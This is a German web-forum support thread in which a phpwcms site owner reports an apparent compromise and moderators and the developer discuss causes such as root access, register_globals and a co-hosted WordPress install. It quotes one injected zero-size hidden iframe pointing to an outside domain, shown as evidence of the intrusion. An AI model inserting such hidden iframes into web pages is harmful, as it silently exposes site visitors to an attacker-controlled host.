phpwcms 1.3.0 Installation möglicherweise gehackt?

Hier bekommst Du deutschsprachigen Support. Keine Fehlermeldungen oder Erweiterungswünsche bitte!
Post Reply
fitus
Posts: 88
Joined: Sat 13. Dec 2003, 19:04

phpwcms 1.3.0 Installation möglicherweise gehackt?

Post by fitus »

Hallo Leute ich hab heute bemerkt, dass meine phpwcms installation vermutlich gehackt wurde, und zwar sieht mein html-code den wcms im back !!! und frontend ausgibt so aus. das kann nicht normal sein.

diese ganzen iframes waren gestern noch nicht da. woher kommt das?
ist das in der 1.3.3 behoben?

Code: Select all

<iframe src="http://www.siyamiozkan-mavideniz.org" frameborder="0" width="0" height="0"></iframe>
...
User avatar
flip-flop
Moderator
Posts: 8178
Joined: Sat 21. May 2005, 21:25
Location: HAMM (Germany)
Contact:

Post by flip-flop »

Hallo fitus,
diese ganzen iframes waren gestern noch nicht da. woher kommt das?
ist das in der 1.3.3 behoben?
Was soll da behoben sein?
Glaubst du das cms System liefert diesen Mist?

Hast du irgendwelche Fremdmodule oder Input Einheiten installiert (Gästebuch, Formular, Login .....?
Schwaches PW?
Offene Verzeichnisse/Dateien?
Hacks installiert?

Ich würde die Logdateien durchsehen, wenn möglich.

Knut
>> HowTo | DOCU | FAQ | TEMPLATES/DOCS << ( SITE )
User avatar
marcus@localhorst
Posts: 815
Joined: Fri 28. May 2004, 11:31
Location: localhorst
Contact:

Post by marcus@localhorst »

flip-flop wrote: Ich würde die Logdateien durchsehen, wenn möglich.
genau, da hat jemand deine index.php und phpwcms.php dateien editiert, über welchen weg auch immer, aber das muss nix mit phpwcms zu tun haben...
User avatar
Oliver Georgi
Site Admin
Posts: 9907
Joined: Fri 3. Oct 2003, 22:22
Contact:

Post by Oliver Georgi »

das klingt nach einem Einbruch von woanders her - was hast Du sonst auf dem System betrieben?

Und sicher register_globals an.

Oder noch ein Wordpress drauf - siehe Meldung von heute bei Heise.

Da man von phpwcms aus keine Schreibrechte auf die php-Dateien bekommt, kann es eigentlich nur über root-Rechte auf Deinem Server erfolgt sein.

Wende Dich an Deinen Provider, dass dieser das mal gegencheckt.

Deinen Titel habe ich geändert, da zumindest phpwcms nicht gehackt wurde - glaube ich nicht. Dann wären bereits andere davon betroffen.

Oliver
Oliver Georgi | phpwcms Developer | GitHub | LinkedIn | Систрон
User avatar
Jensensen
Posts: 3000
Joined: Tue 17. Oct 2006, 21:11
Location: auf der mlauer

Post by Jensensen »

check auch mal in der SQL die
table `phpwcms_user` und `phpwcms_userlog`

bei mir waren mal ganz merkwürdige user anmeldungen (versuche ?!) über die login.php bei der v.1.2.8
jedenfalls standen dort komische user namen – wie auch immer die da rein gekommen sind. und das, obwohl meine admin pwd's selten unter 10m lang sind!

inzwischen alles gelöscht und weg – wg. damaliger umlautproblematik alles frisch gemacht.
war aber sehr verwirrend...

greetz
{so_much} | Knick-Knack. | GitHub
Umlaute im URL sind meistens immer Kacke.
fitus
Posts: 88
Joined: Sat 13. Dec 2003, 19:04

Post by fitus »

Hi Oli,

ich bin momentan duch die nachforschungen auf die schine extern gekommen,

ist ist auch in einer subdomain eine wordpress installiert, aber standard, ohne diese module, die sagen mir gar nichts.
User avatar
Oliver Georgi
Site Admin
Posts: 9907
Joined: Fri 3. Oct 2003, 22:22
Contact:

Post by Oliver Georgi »

wenn der Server anfällig ist, dann reicht, dass jemand anderes ein solches Script drauf hat.

Wie gesagt - die Änderungen sehen nicht nach Script hacking aus, sondern eher nach rootkit oder sowas.

Wird das System eventuell unter Plesk betrieben?

Bei welchem Provider läuft die Maschine?

Oliver
Oliver Georgi | phpwcms Developer | GitHub | LinkedIn | Систрон
fitus
Posts: 88
Joined: Sat 13. Dec 2003, 19:04

Post by fitus »

nein soweit ich weiß ist da kein plesk drauf,

die sache läuft bei conhost - classic

hab mit dem admin geschrieben, ich zieh auf eine andere maschine, bei der php als fastcgi und unter user_id läuft und register_globals off ist.

Mfg
Dani
User avatar
Oliver Georgi
Site Admin
Posts: 9907
Joined: Fri 3. Oct 2003, 22:22
Contact:

Post by Oliver Georgi »

na dann kannst Du davon ausgehen, dass Du nicht alleine warst. Klingt nicht gerade vertrauenserweckend.

Oliver
Oliver Georgi | phpwcms Developer | GitHub | LinkedIn | Систрон
fitus
Posts: 88
Joined: Sat 13. Dec 2003, 19:04

Post by fitus »

ich hab die logfiles duchgesehen, es fand kein zugriff per ftp statt. sicherheitstechnisch war der provider immer top. es kann dann eigentlich nur aus der wordpress installation kommen, aber nicht von meiner, da ich die beschriebenen module nicht drauf hab.
User avatar
juergen
Moderator
Posts: 4556
Joined: Mon 10. Jan 2005, 18:10
Location: Weinheim
Contact:

Post by juergen »

fitus wrote:ich hab die logfiles duchgesehen, es fand kein zugriff per ftp statt.
Hallo,

wenn sich da jemand root Rechte erschlichen hat, wirst du da nichts sehen, falls du wirklich in die Logs des FTP Servers schauen kannst.

Die Sache mit Wordpress hat mich an den HYPE mit PHPWCMS und dem Kontaktformular erinnert.... plötzlich ist ein Programm für alle Schlechtigkeiten dieser Erde verantwortlich. Ein gut angebundener Server hat mitunter pro Stunde bis zu 15MB an Daten reiner ssh Bruteforce Bots.

Unterhalb der PHP Systeme gibt es noch ganz viele Türen und Fenster und jedes System welches sich mit priviligierten Rechten einschleichen kann, benötigt nur noch einen Linux Editor und baut deine Seiten ohne dein Zutun um.

Der Provider wird gut daran tun, die ganze Kiste neu zu bauen. Deswegen wohl das Umzugsangebot ;)
User avatar
Oliver Georgi
Site Admin
Posts: 9907
Joined: Fri 3. Oct 2003, 22:22
Contact:

Post by Oliver Georgi »

:oops: ich wollte mit meinem Post nicht Wordpress schlecht machen, ging eher um "Module" -> ich sehe selber jeden Tag, was User sich gedankenlos auf ihre Systeme ziehen oder noch schlimmer selber zusammenprogrammieren. Schaut mal hier im Forum, was da so teils gefragt wird...

Register_globals sollte IMMER aus sein und nur nach Prüfung des Providers für einen Account und nur im alleräußersten Notfall aktiviert werden. Geht dann meistens um betrieb alter Scripte. Aber alles was neu kommt, ist Schrott, wenn es genau eine solche Einstellung verlangt!

Oliver
Oliver Georgi | phpwcms Developer | GitHub | LinkedIn | Систрон
Post Reply